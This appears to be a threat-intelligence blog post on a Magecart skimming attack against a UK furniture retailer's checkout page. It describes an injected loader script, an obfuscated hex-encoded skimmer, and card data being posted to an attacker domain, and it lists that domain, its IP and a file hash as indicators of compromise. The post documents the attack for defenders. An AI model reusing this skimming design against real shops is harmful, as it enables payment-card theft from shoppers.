Magecart Appears to have Targeted Another Online Retailer

www.sueno.co.uk, a UK based eCommerce retailer focused on Luxury beds, furniture, and mattresses, appears to be the latest victim of the Magecart theft group.

Information about the Magecart group can be found on blog posts by Riskiq and volexity

Numerous tips and open source intelligence has revealed the Seuno site as compromised by Magecart. A script within the sites shopping cart is used to load externally hosted JavaScript from magento.name/mage/mage.js which performs the data theft.

Shown above: Injected script found at www.sueno.co.uk/checkout/onepage/ associated with Sueno’s checkout page which loads a script from magento.name/mage/mage.js

This domain is currently hosted in Russia on the IP address 83.166.243.206.

Shown above: Records show the domain registered as recent as September 06th 2018

The externally located script performs Magecart’s main function and is obfuscated, with a larger portion of it being hex encoded.

Shown above: Obfuscated script “mage.js” found on domain magento.name/mage/

Decoding this script reveals the following:

Shown above: De-obfuscated script used to skim credit card information pointing to magento.name/image/mail2.php

This form looks for specific input fields and captures the data, submitting it over HTTPS via a POST request to the URL magento.name/mage/mail2.php.

Shown above: Credit card information being posted to magento.name/mage/mail2.php

 

Shown above: Raw packet capture shows credit card transmitted to magento.name with www.sueno.co.uk referring traffic.

 

 

Indicators of Compromise:

mage.js – Obfuscated JavaScript used to skim credit card data
SHA-256: 02f6d828a4909b11f8c139055d09a48e52243c147efa542942b7cbd3b79c5fe6
VirusTotal Link

magento.name – POST /mage/mail2.php – Domain hosted by credit card theft group
magento.name/mage/mage.js – Domain hosted by credit card theft group